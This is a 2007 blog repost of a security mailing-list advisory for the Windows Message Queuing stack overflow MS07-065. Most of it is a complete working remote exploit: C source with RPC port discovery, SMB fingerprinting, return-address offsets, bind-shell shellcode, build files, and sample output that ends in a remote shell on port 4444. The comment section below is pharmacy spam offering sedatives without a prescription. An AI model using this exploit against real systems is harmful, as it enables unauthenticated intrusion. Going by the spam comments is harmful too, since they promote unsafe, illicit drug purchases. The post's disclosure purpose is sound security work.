Sunday, December 23, 2007

[EXPL] Microsoft Windows Message Queuing Service Stack Overflow Vulnerability (MS07-065, Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


- - - - - - - - -

Microsoft Windows Message Queuing Service Stack Overflow Vulnerability
(MS07-065, Exploit)
------------------------------------------------------------------------


SUMMARY

A vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Windows with the Message Queuing
Service enabled. Authentication is not required to exploit this
vulnerability. The following exploit code can be used to test your system
for the mentioned vulnerability.

DETAILS

MessageQueueexpl.Acf:
[implicit_handle(handle_t mqhandle)]
interface msmq
{

}

MessageQueueexpl.c:
/*
******************************************************************************
********************** merry christmas Sysadmins
*****************************
******************************************************************************
************** Microsoft Message Queue POC exploit ( MS07-065 )
**************
Mario Ballano - (mballano~gmail.com) - http://www.48bits.com

Andres Tarasco - (atarasco~gmail.com) - http://www.tarasco.org
******************************************************************************

* Original Advisory:
http://www.zerodayinitiative.com/advisories/ZDI-07-076.html
* Microsoft Bulletin :
http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx
* CVE Code: CVE-2007-3039
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3039
* Timeline:
No naked news this time, just rum and whiskey
* Additional information:
From Microsoft support http://support.microsoft.com/?id=178517 : RPC
dynamic RPC ports for MQ 2101,2103,2105
HSC of course

http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_msmq.html

Dave s unmidl http://www.immunitysec.com/resources-freesoftware.shtml
* How to compile: Call your favorite SetEnv.Cmd from microsoft SDK and
then exec nmake.

* Note: There are several rpc ports to trigger the overflow. If you hit a
system then
looks like you ll need to send the exploit twice or specify another
port (-p ) to exploit it again.

There is a chance that offsets are invalid for windows 2000 server
(only spanish win2k advanced server was tested)
Adjust them if needed.


*Usage:

C:\Programaci n\MessageQueue>MessageQueue.exe
--------------------------------------------------------------
Microsoft MessageQueue local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 Advanced server SP4
--------------------------------------------------------------

Usage: MessageQueue.exe -h hostname [-d Dnssuffix] [-n netbiosname] [-p
port] [-t lang]

Targets:
0 (0x6bad469b) - Windows 2000 Advanced server English (default -
untested)
1 (0x6b9d469b) - Windows 2000 Advanced server Spanish
2 (0x41414141) - Windows 2000 Advanced server crash

C:\Programaci n\\MessageQueue>MessageQueue.exe -h 192.168.1.39
--------------------------------------------------------------
Microsoft MessageQueue local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 Advanced server SP4
--------------------------------------------------------------

[+] Binding to ncacn_ip_tcp:192.168.1.39
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[LRPC00000414.00000001]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[QMsvc$testserver]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[QmReplService]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[QMMgmtFacility$testserver]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.39[1222]
[+] Using gathered netbios name: testserver
[+] Dynamic MessageQueue rpc port found (1222)
[+] Connecting to
fdb3a030-065f-11d1-bb9b-00a024ea5525@ncacn_ip_tcp:192.168.1.39[1222]
[+] RpcBindingFromStringBinding success
[+] Trying to fingerprint target...
[+] Fqdn name obtained from netbios packet: testserver.local
[+] Remote OS Fingerprint (05.00)
[+] Remote Host identified as Windows 2000
[+] Sending POC Exploit code to QMCreateObjectInternal()
[+] Try to connect to remote host at port 4444 for a shell

C:\>nc 192.168.1.39 4444
Microsoft Windows 2000 [Versi n 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>


* Some boring technical details:

Calltree: QMCreateObjectInternal() -> IsPathnameForLocalMachine() ->
ReplaceDNSNameWithNetBiosName() -> us

Vulnerable calls functions:
--------------------------
wchar_t *__stdcall ReplaceDNSNameWithNetBiosName(wchar_t *a1,wchar_t *a2)
{
wchar_t *v3; // esi@1

v3 = _wcschr(a1, 92u);
_wcscpy(a2, g_szMachineName);
return _wcscat(a2, v3);
}

Called From:
-------------

if ( !IsPathnameForLocalMachine(v9, (int)&v20) )
{
v11 = -1072824300;
LogMsgHR(20, off_61646450, 50);
return v11;
}
if ( v20 )
{
ReplaceDNSNameWithNetBiosName(v9, &v21);
v9 = &v21;
}
------


--------------------
patched version:
----------------
if ( !IsPathnameForLocalMachine(v9, (int)&v21) )
{
v11 = -1072824300;
LogMsgHR(20, off_61646450, 50);
return v11;
}
if ( v21 )
{
v12 = ReplaceDNSNameWithNetBiosName(v9, &v22, 141);
if ( v12 < 0 )
{
v13 = 55;
return LogHR(v12, off_61646450, v13);
}
v9 = &v22;
}


int __stdcall ReplaceDNSNameWithNetBiosName(wchar_t *a1,wchar_t *a2,int
a3)
{
wchar_t *v3; // eax@1
int result; // eax@4

v3 = _wcschr(a1, 92u);
if ( v3 )
result = StringCchPrintfW(a2, a3, (const char *)L"%s%s", g_szMachineName,
v3);
else
{
if ( byte_6164638C & 1 )
WPP_SF_S(dword_61646380, dword_61646384, 10, (int)&stru_615B5360, a1);
LogMsgHR(6, off_61646450, 2);
result = -1072824314;
}
return result;
}

*/
#define _CRT_SECURE_NO_DEPRECATE
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include "MessageQueuexpl.h"
#include <winsock.h>
#pragma comment(lib,"ws2_32")
#define DEFAULT_RPC_MESSAGEQUEUE_PORT "2105"

void __RPC_FAR * __RPC_USER midl_user_allocate(size_t len){
return(malloc(len)); }
void __RPC_USER midl_user_free(void __RPC_FAR * ptr){ free(ptr); }
int fingerprint (char *host, wchar_t *fqdn); //Fingerprint remote os
for autotarget

struct _targets {
char *version;
char offset[4];
DWORD offsetvalue;
} TARGETS[] = { //supported os
{ "Windows 2000 Advanced server English (default - untested)",
"\x9b\x46\xad\x6b", 0x6bad469b}, //Call EDI @mqlogmgr.dll (English /
1999.8.3413.7) from metasploit database
{ "Windows 2000 Advanced server Spanish (tested)", "\x9b\x46\x9d\x6b",
0x6b9d469b}, // Call EDI (mqlogmgr.dll) win2k adv server sp4 spanish
{ "Windows 2000 server Spanish (untested)", "\x9b\x46\xd4\x6b",
0x6B9D469B}, // Call EDI (mqlogmgr.dll) win2k server sp4 spanish
{ "Windows 2000 Advanced server crash", "\x41\x41\x41\x41",
0x41414141}, // crash
};
int lang=0;

unsigned char shellcode2k[] =
/* win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub

http://metasploit.com */
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa8"
"\x36\xe6\x39\x83\xeb\xfc\xe2\xf4\x54\x5c\x0d\x74\x40\xcf\x19\xc6"
"\x57\x56\x6d\x55\x8c\x12\x6d\x7c\x94\xbd\x9a\x3c\xd0\x37\x09\xb2"
"\xe7\x2e\x6d\x66\x88\x37\x0d\x70\x23\x02\x6d\x38\x46\x07\x26\xa0"
"\x04\xb2\x26\x4d\xaf\xf7\x2c\x34\xa9\xf4\x0d\xcd\x93\x62\xc2\x11"
"\xdd\xd3\x6d\x66\x8c\x37\x0d\x5f\x23\x3a\xad\xb2\xf7\x2a\xe7\xd2"
"\xab\x1a\x6d\xb0\xc4\x12\xfa\x58\x6b\x07\x3d\x5d\x23\x75\xd6\xb2"
"\xe8\x3a\x6d\x49\xb4\x9b\x6d\x79\xa0\x68\x8e\xb7\xe6\x38\x0a\x69"
"\x57\xe0\x80\x6a\xce\x5e\xd5\x0b\xc0\x41\x95\x0b\xf7\x62\x19\xe9"
"\xc0\xfd\x0b\xc5\x93\x66\x19\xef\xf7\xbf\x03\x5f\x29\xdb\xee\x3b"
"\xfd\x5c\xe4\xc6\x78\x5e\x3f\x30\x5d\x9b\xb1\xc6\x7e\x65\xb5\x6a"
"\xfb\x65\xa5\x6a\xeb\x65\x19\xe9\xce\x5e\xf7\x65\xce\x65\x6f\xd8"
"\x3d\x5e\x42\x23\xd8\xf1\xb1\xc6\x7e\x5c\xf6\x68\xfd\xc9\x36\x51"
"\x0c\x9b\xc8\xd0\xff\xc9\x30\x6a\xfd\xc9\x36\x51\x4d\x7f\x60\x70"
"\xff\xc9\x30\x69\xfc\x62\xb3\xc6\x78\xa5\x8e\xde\xd1\xf0\x9f\x6e"
"\x57\xe0\xb3\xc6\x78\x50\x8c\x5d\xce\x5e\x85\x54\x21\xd3\x8c\x69"
"\xf1\x1f\x2a\xb0\x4f\x5c\xa2\xb0\x4a\x07\x26\xca\x02\xc8\xa4\x14"
"\x56\x74\xca\xaa\x25\x4c\xde\x92\x03\x9d\x8e\x4b\x56\x85\xf0\xc6"
"\xdd\x72\x19\xef\xf3\x61\xb4\x68\xf9\x67\x8c\x38\xf9\x67\xb3\x68"
"\x57\xe6\x8e\x94\x71\x33\x28\x6a\x57\xe0\x8c\xc6\x57\x01\x19\xe9"
"\x23\x61\x1a\xba\x6c\x52\x19\xef\xfa\xc9\x36\x51\x47\xf8\x06\x59"
"\xfb\xc9\x30\xc6\x78\x36\xe6\x39";

void usage(char *argv) {
int i;
printf(" Usage: %s -h hostname [-d Dnssuffix] [-n netbiosname] [-p
port] [-t lang]\n\n",argv);
printf(" Targets:\n");
for(i=0;i<sizeof(TARGETS)/sizeof(struct _targets);i++) {
printf(" %i (0x%8.8x) -
%s\n",i,TARGETS[i].offsetvalue,TARGETS[i].version);
}
exit(1);
}

char *DiscoverPort(char *host, char *uid, char *netbiosname) {
/* Idea ripped from Sir Dystic Rpcdump */
unsigned char pszStringBinding[256];
UUID uuid;
RPC_EP_INQ_HANDLE context;
RPC_IF_ID id;
RPC_BINDING_HANDLE handle, handle2;
unsigned char * ptr;
unsigned char * ptr2;
unsigned char * ptr3;
int dynamic=0;
char name[256]="";

sprintf(pszStringBinding,"ncacn_ip_tcp:%s",host); //Construct binding
if (RpcBindingFromStringBinding(pszStringBinding, &handle) == RPC_S_OK)
{
printf("[+] Binding to %s\n",pszStringBinding);
if (RpcMgmtEpEltInqBegin( handle, RPC_C_EP_ALL_ELTS, NULL, 0, &uuid,
&context)== RPC_S_OK) {
while ( RpcMgmtEpEltInqNext(context, &id, &handle2, &uuid, &ptr)
== RPC_S_OK) {
UuidToString(&id.Uuid, &ptr2);
if (strcmp(uid,ptr2)==0) {
char *p;
RpcBindingToStringBinding(handle2, &ptr3);
printf("[+] Found %s version %u.%u\n", ptr2, id.VersMajor,
id.VersMinor);
printf("[+] RPC binding string: %s\n", ptr3);
p=strchr(ptr3,'[');
if (p) {
RpcStringFree(&ptr2);
p[strlen(p)-1]='\0';
dynamic=atoi(p+1);
if (dynamic!=0) {
strcpy(netbiosname,name);
return(p+1);
} else {
char *q;
q=strchr(p+1,'$');
if (q) {
fflush(stdout);
strcpy(name,q+1);
}
}
}
}
RpcStringFree(&ptr2);
if (handle2 != NULL) RpcBindingFree(&handle2);
if (ptr != NULL) RpcStringFree(&ptr);
}
}
}
return(NULL);
}

/******************************************************************************************************/

void __cdecl main(int argc, char *argv[])
{
RPC_STATUS status;
unsigned char * pszUuid = "fdb3a030-065f-11d1-bb9b-00a024ea5525";
unsigned char * pszProtocolSequence = "ncacn_ip_tcp";
unsigned char * pszNetworkAddress = NULL;
unsigned char * pszEndpoint = NULL;
unsigned char * pszOptions = NULL;
unsigned char * pszStringBinding = NULL;
unsigned char * port = NULL;
unsigned char * pDnsSuffix = NULL;
unsigned long ulCode;
int i;
unsigned char NetbiosName[256] ="";

printf("
--------------------------------------------------------------\n");
printf(" Microsoft MessageQueue local & remote RPC Exploit code\n");
printf(" Exploit code by Andres Tarasco & Mario Ballano\n");
printf(" Tested against Windows 2000 Advanced server SP4 \n");
printf("
--------------------------------------------------------------\n\n");


if (argc==1) usage(argv[0]); //Handle parameters
for(i=1;i<argc;i++) {
if ( (argv[i][0]=='-') ) {
switch (argv[i][1]) {
case 'h':
pszNetworkAddress=argv[i+1];
break;
case 't':
lang=atoi(argv[i+1]);
break;
case 'p':
port=argv[i+1];
break;
case 'd':
pDnsSuffix=argv[i+1];
break;
case 'n':
strcpy(NetbiosName,argv[i+1]);
break;
default:
printf("[-] Invalid parameter: %s\n",argv[i]);
usage(argv[0]);
break;
}
i++;
}
}

if ((pszNetworkAddress==NULL) ) usage(argv[0]); //Test if the remote
server is supported (2k & XP)

pszEndpoint=DiscoverPort(pszNetworkAddress,pszUuid,NetbiosName);
if (*NetbiosName=='\0') {
printf("[-] Failed to gather NetbiosName with rpc..\n");
}
printf("[+] Using gathered netbios name: %s\n",NetbiosName);
if (!port) {
if (pszEndpoint) {
printf("[+] Dynamic MessageQueue rpc port found (%s)\n",pszEndpoint);
} else {
printf("[-] Unable to find dynamic MessageQueue port\n");
printf("[+] Maybe remote rpc endpoint isnt running\n");
pszEndpoint=DEFAULT_RPC_MESSAGEQUEUE_PORT;
printf("[+] Trying default port %s\n",pszEndpoint);
}
} else {
pszEndpoint=port;
printf("[+] Trying MessageQueue port %s\n",pszEndpoint);
}


//Create an RPC binding string
status =
RpcStringBindingCompose(pszUuid,pszProtocolSequence,pszNetworkAddress,pszEndpoint,pszOptions,&pszStringBinding);
printf("[+] Connecting to %s\n", pszStringBinding);

if (status==RPC_S_OK) {
status = RpcBindingFromStringBinding(pszStringBinding,&mqhandle);
//RPC Binding
if (status==RPC_S_OK) {
long parama=1;
wchar_t *paramb;//Rpc call parameter1
long paramc=0;
long paramd=0;
long parame=0;
long paramf=0;
long paramg=0;
long ret;
char bof[4096];
int os;

printf("[+] RpcBindingFromStringBinding success\n");
paramb=(wchar_t*)malloc(1000);
memset(paramb,'\0',1000);

if (!pDnsSuffix) {
os=fingerprint(pszNetworkAddress,paramb);
wcscat(paramb,L"\\");
memset((char*)paramb+wcslen(paramb)*2,'A',600);
} else {
os=fingerprint(pszNetworkAddress,NULL);
sprintf(bof,"%s.%s\\",NetbiosName,pDnsSuffix);
mbstowcs(paramb,bof,strlen(bof));
memset((char*)paramb+strlen(bof)*2,'A',600);
}

switch (os) {
case 0: //windows 2000
printf("[+] Remote Host identified as Windows 2000\n");
//exploit SEH handler for Windows 2000 advanced server
memcpy((char*)paramb+352,TARGETS[lang].offset,4); //mqlogmgr.dll call
edi
memcpy((char*)&paramb[0]+352+4+60,shellcode2k,sizeof(shellcode2k));
//shellcode
break;
case 1: //windows XP
printf("[+] Remote Host identified as Windows XP\n");
printf("[+] Sorry, but xp isnt supported yet :p\n");
//TODO: Add your code here =)
exit(1);
break;
case 2:
printf("[-] Remote Host identified as Windows 2003\n");
default:
printf("[-] Remote Host is not vulnerable\n");
exit(1);
}



printf("[+] Sending POC Exploit code to QMCreateObjectInternal()\n");
printf("[+] Try to connect to remote host at port 4444 for a shell\n");

RpcTryExcept {
ret=QMCreateObjectInternal(
parama,
paramb,
paramc,
paramd,
parame,
paramf,
paramg) ;
printf("[-] Return code: %i - %i\r",ret,GetLastError());
}
RpcExcept(1) {
ulCode = RpcExceptionCode(); //Show returned errors from
QMCreateObjectInternal() Message Queue Server
printf("[-] RPC Server reported exception 0x%lx = %ld\n",
ulCode, ulCode);
switch (ulCode) {
case 1722:printf("[-] Looks like there is no available rpc
server\n"); break;
case 1726:printf("[-] Looks like remote RPC server crashed
:/\n"); break;
default: break;
}
}
RpcEndExcept
}
}
}

/******************************************************************************************************/

int fingerprint (char *host,wchar_t *fqdn) {
char req1[] =
"\x00\x00\x00\x85\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f"
"\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02"
"\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f"
"\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70"
"\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30"
"\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54"
"\x20\x4c\x4d\x20\x30\x2e\x31\x32";
char req2[] =
"\x00\x00\x00\xa4\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
"\x00\x00\x10\x00\x0c\xff\x00\xa4\x00\x04\x11\x0a\x00\x00\x00\x00"
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xd4\x00\x00\x80\x69\x00\x4e"
"\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xe0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00"
"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
"\x35\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
"\x2e\x00\x30\x00\x00\x00\x00";

WSADATA ws;
int sock;
struct sockaddr_in remote;
unsigned char buf[0x300];
int i;
OSVERSIONINFO os;

if (strcmp(host,"127.0.0.1")==0) {
os.dwOSVersionInfoSize =sizeof(OSVERSIONINFO);
GetVersionEx(&os);
if (os.dwMajorVersion==5) return (os.dwMinorVersion);
else return(-1);
}
if (WSAStartup(MAKEWORD(2,0),&ws)!=0) {
printf("[-] WsaStartup() failed\n");
exit(1);
}
//NetWkstaGetInfo
remote.sin_family = AF_INET;
remote.sin_addr.s_addr = inet_addr(host);
remote.sin_port = htons(445);
sock=socket(AF_INET, SOCK_STREAM, 0);
printf("[+] Trying to fingerprint target...\n");

if (connect(sock,(struct sockaddr *)&remote, sizeof(remote))>=0) {
if (send(sock, req1, sizeof(req1),0) >0) {
if (recv(sock, buf, sizeof (buf), 0) > 0) {
if (send(sock, req2, sizeof(req2),0) >0) {
i=recv(sock, buf, sizeof (buf), 0);
if (i>0) {
if (fqdn) { //extract fqdn name from rpc packet
char *p=buf+0x67;
WORD len;
//DumpMem(buf,i);
while(memcmp(p,"\x04\x00",2)!=0) p+=2;
p+=2;
memcpy((char*)&len,p,2);
//printf("longitud: %i bytes\n",len);
memcpy((char*)fqdn,p+2,len);
printf("[+] Fqdn name obtained from netbios packet: %S\n",fqdn);
}

printf("[+] Remote OS Fingerprint
(%2.2x.%2.2x)\n",buf[0x60-1], buf[0x60]);

if (buf[0x60-1]==5) {
return(buf[0x60]);
} else {
printf("\n[-] Unssuported OS\n");
}
} else {
printf("\n[-] Recv2 failed\n");
}
} else {
printf("\n[-] Send2 failed\n");
}
} else {
printf("\n[-] Recv failed\n");
}
} else {
printf("\n[-] Send failed\n");
}
} else {
printf("\n[-] Connect failed\n");
}
return(-1);
}

MessageQueuexpl.ldl:
//exported functions
[ uuid (fdb3a030-065f-11d1-bb9b-00a024ea5525),
version(1.0),
pointer_default(unique)
]
interface msmq
{
//0x00
void QMOpenQueue(void);
void QMGetRemoteQueueName(void);
void QMOpenRemoteQueue(void);
void QMCloseRemoteQueueContext(void);
void QMCreateRemoteCursor(void);
void QMSendMessageInternal(void);
//0x06
long QMCreateObjectInternal(
[in] long parama,
[in] [string] wchar_t *paramb,
[in] long paramc,
[in] long paramd,
[in] long parame,
[in] long paramf,
[in] long paramg);
//0x07
void QMSetObjectSecurityInternal(void);
//0x08
void QMGetObjectSecurityInternal(void);
//0x09
void QMDeleteObject(void);
//0x0a
void QMGetObjectProperties(void);
//0x0b
void QMSetObjectProperties(void);
//0x0c
void QMObjectPathToObjectFormat(void);
//0x0d
void QMAttachProcess(void);
//0x0e
void QMGetTmWhereabouts(void);
//0x0f
void QMEnlistTransation(void);
//0x10
void QMEnlistInternalTransaction(void);
//0x11
void QMCommitTransaction(void);
//0x12
void QMAbortTransaction(void);
//0x13
void QMOpenQueueInternal(void);
//0x14
void ACCloseHandle(void);
//0x15
void ACCreateCursor(void);
//0x16
void ACCloseCursor(void);
//0x17
void ACSetCursorProperties(void);
//0x18
void ACSendMessage(void);
//0x19
void ACReceiveMessage(void);
//0x1a
void ACHandleToFormatName(void);
//0x1b
void ACPurgeQueue(void);
//0x1c
void QMQueryQMRegistryInternal(void);
//0x1d
void QMListInternalQueues(void);
//0x1e
void QMCorrectOutSequence(void);
//0x1f
void QMGetRemoteQMServerPort(void);
//0x20
void QMGetMsmqServiceName(void);
//0x21
void QMCreateDSObjectInternal(void);

}

Makefile:
!include <Win32.Mak>

!if "$(CPU)" == "i386"
cflags = $(cflags) -D_CRTAPI1=_cdecl -D_CRTAPI2=_cdecl
!else
cflags = $(cflags) -D_CRTAPI1= -D_CRTAPI2=
!endif

all : MessageQueuexplc

# Make the client side application MessageQueuexplc
MessageQueuexplc : MessageQueue.exe
MessageQueue.exe : MessageQueuexplc.obj MessageQueuexpl_c.obj
$(link) $(linkdebug) $(conflags) -out:MessageQueue.exe \
MessageQueuexplc.obj MessageQueuexpl_c.obj \
rpcrt4.lib $(conlibsdll)

# MessageQueuexplc main program
MessageQueuexplc.obj : MessageQueuexplc.c MessageQueuexpl.h
$(cc) $(cdebug) $(cflags) $(cvarsdll) /W3 $*.c

# MessageQueuexplc stub
MessageQueuexpl_c.obj : MessageQueuexpl_c.c MessageQueuexpl.h
$(cc) $(cdebug) $(cflags) $(cvarsdll) /W3 $*.c


# remote procedures
MessageQueuexplp.obj : MessageQueuexplp.c MessageQueuexpl.h
$(cc) $(cdebug) $(cflags) $(cvarsdll) /W3 $*.c

# Stubs and header file from the IDL file
MessageQueuexpl.h MessageQueuexpl_c.c : MessageQueuexpl.idl
MessageQueuexpl.acf
midl $(MIDL_OPTIMIZATION) -oldnames -use_epv -no_cpp
MessageQueuexpl.idl

# Clean up everything
clean :
-del *.exe
-del MessageQueuexpl_s.c
-del *.pdb
-del *.obj
-del MessageQueuexpl_c.c
-del MessageQueuexpl.h


ADDITIONAL INFORMATION

The information has been provided by <mailto:mballano@gmail.com> Mario
Ballano <mailto:atarasco@gmail.com> and Andres Tarasco.

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

26 comments:

  1. Anonymous5:21 PM

    ambien online no prescription generic ambien 516 - 10 mg ambien overdose

    ReplyDelete
  2. Anonymous1:36 AM

    lorazepam mg ativan gi side effects - ativan long before addiction

    ReplyDelete
  3. Anonymous4:07 AM

    generic zolpidem ambien cr trip - buy generic ambien canada

    ReplyDelete
  4. Anonymous9:57 AM

    buy generic valium is roche valium better than generic - valium 10 mg sale

    ReplyDelete
  5. Anonymous12:58 AM

    generic valium buy 1000 valium - complete list valium side effects

    ReplyDelete
  6. Anonymous11:48 AM

    zolpidem online zolpidem india buy - where can i get ambien over the counter

    ReplyDelete
  7. Anonymous5:20 AM

    diazepam buy diazepam dosage pain - how to buy valium online legally

    ReplyDelete
  8. Anonymous6:38 AM

    buy generic ativan buy lorazepam without prescriptions - ativan online no prescription

    ReplyDelete
  9. Anonymous1:25 AM

    diazepam 10 mg 8 mg diazepam safe - diazepam pregnancy use

    ReplyDelete
  10. Anonymous6:41 PM

    order ativan ativan gluten free - ativan vs xanax for flying

    ReplyDelete
  11. Anonymous7:51 PM

    xanax without a perscription buy xanax online with insurance - xanax overdose facts

    ReplyDelete
  12. Anonymous7:21 AM

    ambien on line ambien cr classification - cost of brand name ambien

    ReplyDelete
  13. Anonymous2:12 AM

    buy soma online tramadol soma online - carisoprodol withdrawal symptoms

    ReplyDelete
  14. Anonymous11:53 AM

    buy valium diazepam valium side effects coming off - valium effects dosage

    ReplyDelete
  15. Anonymous8:09 PM

    buy soma order soma online from mexico - somanabolic muscle maximizer and all bonus programs review

    ReplyDelete
  16. Anonymous1:53 AM

    generic valium pill identifier drug company behind valium - valium side effects children

    ReplyDelete
  17. Anonymous5:38 PM

    soma generic soma muscle relaxer erowid - somanabolic muscle maximizer yahoo answers

    ReplyDelete
  18. Anonymous7:55 PM

    buy valium online valium maker - buy valium 90 pills

    ReplyDelete
  19. Anonymous7:25 AM

    ambien sale ambien side effects - legal order ambien online

    ReplyDelete
  20. Anonymous9:47 AM

    buy valium cheap cost generic valium without insurance - order valium online cheap

    ReplyDelete
  21. Anonymous3:23 PM

    buy ambien online ambien prescription drug - generic for ambien side effects

    ReplyDelete
  22. Anonymous2:57 AM

    valium drug valium drug addiction - long does 5mg valium stay system

    ReplyDelete
  23. Anonymous7:45 AM

    Tablets Machinery Compact Detergent Press valtrex pills online - valacyclovir no prescription http://www.cogccc.org/, [url=http://www.cogccc.org/]generic valtrex [/url]

    ReplyDelete
  24. Anonymous4:54 PM

    T3 Medication reductil price - buy generic sibutramine http://www.meridiaonlineorder.net/#buy-generic-sibutramine , [url=http://www.meridiaonlineorder.net/#purchase-meridia ]purchase meridia [/url]

    ReplyDelete
  25. Anonymous5:44 AM

    4, atomoxetine online - cheap strattera online http://www.stratterafastonline.net/, [url=http://www.stratterafastonline.net/]strattera online no prescription [/url]

    ReplyDelete
  26. Anonymous12:20 PM

    1, [url=http://www.maxaltonlinehelp.net/] Cheap Maxalt[/url] - Cheap Maxalt - maxalt price http://www.maxaltonlinehelp.net/.

    ReplyDelete